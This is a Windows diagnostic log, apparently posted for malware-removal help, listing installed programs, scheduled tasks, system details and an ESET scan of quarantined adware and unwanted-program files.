Cake Mania (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111199750}) (Version:  - Oberon Media)
Chuzzle (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110411970}) (Version:  - Oberon Media)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Diner Dash (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110305887}) (Version:  - Oberon Media)
DJ_AIO_06_F4500_SW_MIN (Version: 140.0.690.000 - Hewlett-Packard) Hidden
Dream Day First Home (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113832110}) (Version:  - Oberon Media)
eDeals version 1.0 (HKLM\...\eDeals_is1) (Version: 1.0 - eDeals)
eMachines (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11019760}) (Version:  - Oberon Media)
eMachines Recovery Management (HKLM\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 3.1.3003 - Acer Incorporated)
eMachines ScreenSaver (HKLM\...\{79DD56FC-DB8B-47F5-9C80-78B62E05F9BC}) (Version: 1.02.0902 - Acer Incorporated)
Galapago (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111307457}) (Version:  - Oberon Media)
Garmin BaseCamp (HKLM\...\{7C69F731-6471-48FE-899B-1C40F80042C7}) (Version: 4.4.2 - Garmin Ltd or its subsidiaries)
Garmin City Navigator Europe NT 2012.20 Update (HKLM\...\{6D3A83A6-8F72-4354-A80D-721D1E54FC76}) (Version: 15.20.0.0 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM\...\{ABA5E381-EC46-425C-86C5-5CD15BBFB4BF}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
GearDrvs (Version: 1.00.0000 - GEAR Software) Hidden
HP Deskjet F4500 All-in-One Driver 14.0 Rel. 6 (HKLM\...\{0AFFEA39-60AF-4C4F-BB47-4A1F7CB12129}) (Version: 14.0 - HP)
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - Intel Corporation)
InterVideo WinDVD 8 (HKLM\...\InstallShield_{20471B27-D702-4FE8-8DEC-0702CC8C0A85}) (Version: 8.0-B9.498 - InterVideo Inc.)
InterVideo WinDVD 8 (Version: 8.0-B9.498 - InterVideo Inc.) Hidden
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Konz 2013 (HKLM\...\InstallShield_{76651FD7-2B71-4B61-9F3A-E82F52F08D92}) (Version: 1.00.0000 - USM)
Konz 2013 (Version: 1.00.0000 - USM) Hidden
Launch Manager (HKLM\...\LManager) (Version:  - )
LightScribe  1.4.142.1 (Version: 1.4.142.1 - hxxp://www.lightscribe.com) Hidden
Luxor (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111265347}) (Version:  - Oberon Media)
Mahjong Escape Ancient China (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111252743}) (Version:  - Oberon Media)
Malwarebytes Anti-Malware Version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Mesh Runtime (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 Language Pack SP1 - DEU (HKLM\...\Microsoft .NET Framework 3.5 Language Pack SP1 - deu) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Automated Troubleshooting Services Shim (HKLM\...\{c9920352-04e6-469d-bab8-e2b9c7c75415}.sdb) (Version:  - )
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Office Outlook Connector (HKLM\...\{95140000-007A-0407-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Works (HKLM\...\{4EA2F95F-A537-4d17-9E7F-6B3FF8D9BBE3}) (Version: 08.05.0822 - Microsoft Corporation)
MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden
myphotobook.de (HKLM\...\de.myphotobook.creator.001F9DF2D0BAABEB11F42CCEE43224607B61109C.1) (Version: 1.4.3 - myphotobook GmbH)
myphotobook.de (Version: 1.4.3 - myphotobook GmbH) Hidden
Network (Version: 140.0.215.000 - Hewlett-Packard) Hidden
NTI Media Maker 8 (HKLM\...\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6325 - NewTech Infosystems)
NTI Media Maker 8 (Version: 8.0.12.6325 - NewTech Infosystems) Hidden
Ravensburger tiptoi (HKLM\...\Ravensburger tiptoi) (Version:  - )
Scan (Version: 140.0.80.000 - Hewlett-Packard) Hidden
Segoe UI (Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Steuer 2012 (HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\{01159E8A-44F7-4885-A7F9-872CE4D74063}) (Version: 20.00.8137 - Buhl Data Service GmbH)
Toolbox (Version: 140.0.428.000 - Hewlett-Packard) Hidden
Turbo Pizza (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113009953}) (Version:  - Oberon Media)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0407-0000-0000000FF1CE}_ENTERPRISE_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version:  - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0407-0000-0000000FF1CE}_HOMESTUDENTR_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version:  - Microsoft)
Update für Microsoft Office Outlook 2007 Help (KB963677) (HKLM\...\{90120000-001A-0407-0000-0000000FF1CE}_ENTERPRISE_{F6828576-6F79-470D-AB50-69D1BBADBD30}) (Version:  - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0407-0000-0000000FF1CE}_ENTERPRISE_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version:  - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0407-0000-0000000FF1CE}_HOMESTUDENTR_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version:  - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0407-0000-0000000FF1CE}_ENTERPRISE_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version:  - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0407-0000-0000000FF1CE}_HOMESTUDENTR_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version:  - Microsoft)
WEB.DE Desktop Icons (HKLM\...\1&1 Mail & Media GmbH 1und1DesktopIconsInstaller) (Version: 3.0.5.0 - 1&1 Mail & Media GmbH)
WEB.DE MailCheck für Internet Explorer (HKLM\...\1&1 Mail & Media GmbH Toolbar IE8) (Version: 2.6.0.4 - 1&1 Mail & Media GmbH)
WEB.DE Softwareaktualisierung (HKLM\...\1&1 Mail & Media GmbH 1und1Softwareaktualisierung) (Version: 3.0.1.0 - 1&1 Mail & Media GmbH)
Windows 7 Upgrade Advisor (HKLM\...\{9A4D182C-35C7-4791-8484-4304EBC9101A}) (Version: 2.0.5000.0 - Microsoft Corporation)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices  (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX control for remote connections (HKLM\...\{C5398A89-516C-4DAF-BA07-EE7949090E56}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{5D39BBA0-67EE-42FE-8640-57C456AE4C8A}\InprocServer32 -> C:\Users\finja\AppData\LocalLow\WiseConvert_1.3_B2\prxtbWis0.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}\InprocServer32 -> C:\Users\finja\AppData\Local\Conduit\Community Alerts\Alert.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{F9E1BD9A-84B5-4D12-9195-0B3E7D86FD35}\InprocServer32 -> C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll No File

==================== Restore Points  =========================

05-12-2014 19:07:39 Prüfpunkt von HitmanPro
05-12-2014 19:31:46 Prüfpunkt von HitmanPro

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2006-11-02 11:23 - 2014-12-06 09:03 - 00000732 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {1245B223-395D-46A5-93D1-C9AE1D55861B} - System32\Tasks\Registration 1und1 Task => C:\Program Files\1und1Softwareaktualisierung\cdsupdclient.exe [2014-03-31] (1&1 Mail & Media GmbH)
Task: {5E8F5D12-D836-4FA2-A55F-60B345663AEB} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Signature Update => c:\program files\windows defender\MpCmdRun.exe [2008-01-21] (Microsoft Corporation)
Task: {7BEF1111-7860-4E60-BC36-8822405C6078} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - finja => C:\Program Files\Windows Calendar\WinCal.exe [2009-04-11] (Microsoft Corporation)
Task: {B2DE553E-4F93-444A-B89F-264EA7144119} - System32\Tasks\1und1 Konfiguration => C:\ProgramData\1und1InternetExplorerAddon\ConfigTask.exe [2011-03-16] (1und1 Mail und Media GmbH)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Loaded Modules (whitelisted) =============

2008-07-30 05:01 - 2003-06-07 06:30 - 00057344 _____ () C:\Program Files\Launch Manager\PowerUtl.dll
2009-02-27 10:19 - 2008-06-11 11:18 - 00024576 _____ () C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe
2009-02-27 10:19 - 2009-02-27 10:19 - 00032768 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.Controller\3.0.3009.0__14bcaafdb44b5951\Framework.Model.Controller.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00009216 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.ControllerInterface\3.0.3009.0__d842b71b4d6ed079\Framework.Model.ControllerInterface.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00061440 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Library\3.0.3009.0__3036420f80dd6947\Framework.Library.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00015360 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Host\3.0.3009.0__672b450de5a7e94a\Framework.Host.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00006144 _____ () C:\Windows\assembly\GAC_MSIL\Framework.PluginInterface\3.0.3009.0__9ecdf03bb2054f94\Framework.PluginInterface.dll
2009-02-27 10:20 - 2009-02-27 10:20 - 00036864 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Utility\3.0.3009.0__4df5dcab8860d239\Framework.Utility.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

Administrator (S-1-5-21-717213786-2690546565-922636609-500 - Administrator - Disabled)
finja (S-1-5-21-717213786-2690546565-922636609-1000 - Administrator - Enabled) => C:\Users\finja
Gast (S-1-5-21-717213786-2690546565-922636609-501 - Limited - Disabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (12/06/2014 05:42:55 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


System errors:
=============

Microsoft Office Sessions:
=========================

CodeIntegrity Errors:
===================================
  Date: 2014-12-06 17:45:29.453
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 17:45:28.705
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 17:45:28.034
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 17:45:27.269
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 17:42:43.298
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 17:34:41.463
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 16:31:55.653
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 16:31:55.029
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 16:31:54.405
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 16:31:53.812
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.


==================== Memory info =========================== 

Processor: Pentium(R) Dual-Core CPU T4200 @ 2.00GHz
Percentage of memory in use: 39%
Total physical RAM: 3001.08 MB
Available physical RAM: 1807.48 MB
Total Pagefile: 6206.44 MB
Available Pagefile: 5056.82 MB
Total Virtual: 2047.88 MB
Available Virtual: 1917.1 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:288.08 GB) (Free:238.87 GB) NTFS ==>[Drive with boot components (obtained from BCD)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 93D3AC9B)
Partition 1: (Not Active) - (Size=10 GB) - (Type=27)
Partition 2: (Active) - (Size=288.1 GB) - (Type=07 NTFS)

==================== End Of Log ============================
         
Eset:
Code:
ATTFilter
ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=9787e563c042db41b574c32595c3ea1b
# engine=21431
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2014-12-06 07:36:59
# local_time=2014-12-06 08:36:59 (+0100, Mitteleuropäische Zeit)
# country="Germany"
# lang=1031
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode_1='Microsoft Security Essentials'
# compatibility_mode=5895 16777213 100 100 6527612 112075823 0 0
# scanned=154063
# found=69
# cleaned=0
# scan_time=6532
sh=321FFA63BC10C82EBF9D52BBC8DFAD1635A7D88D ft=1 fh=6345b32e772ed437 vn="Win32/AdWare.Adpeak.F Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\003\buuoujqmrk32.exe.vir"
sh=29537B5D9E0B9006067890E1D21D0CE6F22E8A99 ft=1 fh=6e7ef67f604e413f vn="Win32/MyPCBackup.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\RegClean Pro\Cloud_Backup_Setup.exe.vir"
sh=EE0DBC090D6FC9DA0D0A84516D8D34BF1F96E196 ft=1 fh=44b5db033c27eea0 vn="Win32/MyPCBackup.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\RegClean Pro\Cloud_Backup_Setup_Intl.exe.vir"
sh=C0609E1F5D8AAAF448DE3D651ACA815A2986AB05 ft=1 fh=a2503cb71d9d5470 vn="Variante von Win32/Systweak.K evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\RegClean Pro\RCPUninstall.exe.vir"
sh=9896DAB927F232F334AAC794EE39E4741E8560AD ft=1 fh=20cdc242a13dadda vn="MSIL/AdvancedSystemProtector.D evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\RegClean Pro\systweakasp.exe.vir"
sh=B470497F7EA96F4B7447C32EBB0052D56A8F8DAF ft=1 fh=3c7e4e17a056443d vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SearchProtect\UI\bin\cltmngui.exe.vir"
sh=85FEDAE029E2FB63F3090177E7068FC8A40ABE52 ft=1 fh=caabccb7d7d354a0 vn="Variante von MSIL/BrowseFox.H evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\snipsmart\bin\utilsnipsmart.exe.vir"
sh=C7C0F42A23562AA6DCCD60326FD8CC2AA41B5448 ft=1 fh=c053642cee9f3def vn="Win32/Thinknice.B evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\DpInterface32.dll.vir"
sh=125B1C393F2104CBA08183E495C0907BFF7EDA22 ft=1 fh=ea25908c8365106f vn="Win64/Thinknice.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\DpInterface64.dll.vir"
sh=8E85792765D0E0BF52107CFF4A6620995DB19BB0 ft=1 fh=627da500ea2e265f vn="Variante von Win32/Thinknice.B evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\DpInterfacef32.dll.vir"
sh=2FCA2173F2DD16DF8F1F990170FA4479FC5D5BFC ft=1 fh=c528dd1cda99a111 vn="Variante von Win32/ELEX.AR evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\RSHP.exe.vir"
sh=6043D1ACD51FD373472020FBB748C405AAF22397 ft=1 fh=4c716dbbae6c21b9 vn="Win32/Thinknice.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\SearchProtect32.dll.vir"
sh=FF431CD8693F4045BD7BD87DBCE54B820F000FC0 ft=1 fh=16c2e1bd3fd6b7e2 vn="Win64/Thinknice.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\SearchProtect64.dll.vir"
sh=5836A5DF3860241F6B69F2292ABCE592A13689B6 ft=1 fh=a3db04555f559ea8 vn="Variante von Win32/Thinknice.C evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\SpAPPSv32.dll.vir"
sh=E97CBDBD7CFED2C58464C1ABF186520022DE5666 ft=1 fh=7a2ea5ecc33ad0e3 vn="Variante von Win64/Thinknice.C evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\SpAPPSv64.dll.vir"
sh=9DC13DB9C123270C2356ED410128E11D5ADF7C6E ft=1 fh=023ab782f0a9b07d vn="Win32/Thinknice.B evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SupTab\SupTab.dll.vir"
sh=3F8CCD9279F8D950622F536D3202CC0E44134A8E ft=1 fh=4cb693d7b46c457f vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\sweetpacks bundle uninstaller\uninstaller.exe.vir"
sh=5B5B8E23D211386BDC476070C54209D98BFD8327 ft=1 fh=c0dcf2cdc253f7be vn="Variante von MSIL/Adware.PullUpdate.H Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Browser\prompt.exe.vir"
sh=75F83D0E2071210C11B550863EC82F53D0E195A9 ft=1 fh=71573f5a1c96d142 vn="Win32/Toolbar.Conduit.AJ evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Conduit\IE\CT3300854\UninstallerUI.exe.vir"
sh=56659F7FF1F1FA7906A77228E315F65F38BCEF73 ft=1 fh=0ff759dfc352fd03 vn="Variante von Win32/ELEX.AV evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\IePluginServices\PluginService.exe.vir"
sh=2CDAC140B71911CFE8C9BB2CD7D383E11413A69A ft=1 fh=765497c44fa2b0ff vn="Variante von MSIL/Adware.PullUpdate.B Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Websteroids\Websteroids.exe.vir"
sh=0B282431D560C9CB16696F6313A29B5B2853A366 ft=1 fh=868041b6d05f6e12 vn="Variante von MSIL/Adware.PullUpdate.A Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Websteroids\WebsteroidsService.exe.vir"
sh=14ACB00F6620EF6B811532EEF5191B17733A27D7 ft=1 fh=5483cf7e3d987a9e vn="Variante von MSIL/Adware.PullUpdate.D Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Websteroids\up\2.6.80\Websteroids.exe.vir"
sh=6313485982F4C1CB08A7AB87E8D1D14A60AB8BE9 ft=1 fh=21f1bc8d1875a69a vn="Variante von MSIL/Adware.PullUpdate.A Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Websteroids\up\2.6.80\WebsteroidsService.exe.vir"
sh=E2702E15F00C3ECD2699295A34BC10AA347E56B6 ft=1 fh=a0e2dd5d83ce6880 vn="MSIL/Adware.PullUpdate.I Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Websteroids\up\2.6.80\WebsteroidsUpdate.exe.vir"
sh=663BA7DC1FEC289459257F80D8939DF1A114AE27 ft=1 fh=6ba09f8cd916608c vn="Win32/AnyProtect.E evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\AnyProtectScannerSetup.exe.vir"
sh=924549AF541A4C150B724735001C213A339A4141 ft=0 fh=0000000000000000 vn="JS/Toolbar.Crossrider.B evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\bakgmemkflciahncfpgaebpnknhejeja\1.26.74_0\extensionData\plugins\91.js.vir"
sh=04E0D3AC77C2523A75A52C4E811EA6C947A58D4E ft=0 fh=0000000000000000 vn="JS/Astromenda.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\ehjldlodmkdlooagebfnaghgmkfccipn\0.3.8_0\js\background.js.vir"
sh=F2A8917500E1C6B9E4ADD5299BAF66B57DD4EB63 ft=0 fh=0000000000000000 vn="JS/Astromenda.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\ehjldlodmkdlooagebfnaghgmkfccipn\0.3.8_0\js\bootstrap.js.vir"
sh=CE3159B58A6DFF52E43F2445A4E094B983DD0EBA ft=0 fh=0000000000000000 vn="JS/Astromenda.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\ehjldlodmkdlooagebfnaghgmkfccipn\0.3.8_0\js\newtab.js.vir"
sh=FD7368BFE59CB6D2E4853110A8BDE09937D30BFA ft=0 fh=0000000000000000 vn="JS/Astromenda.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\ehjldlodmkdlooagebfnaghgmkfccipn\0.3.8_0\js\opentab.js.vir"
sh=B72480019936ABB36AA5B818B9F05F51218A25C4 ft=0 fh=0000000000000000 vn="JS/Astromenda.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfkfdlcdbajamklbneflfbcmfgddmpae\0.3.6_0\js\background.js.vir"
sh=066AF5B49F45E3482CA872FD73320BBB087FE9C4 ft=0 fh=0000000000000000 vn="JS/Astromenda.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\finja\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfkfdlcdbajamklbneflfbcmfgddmpae\0.3.6_0\js\bootstrap.js.vir"
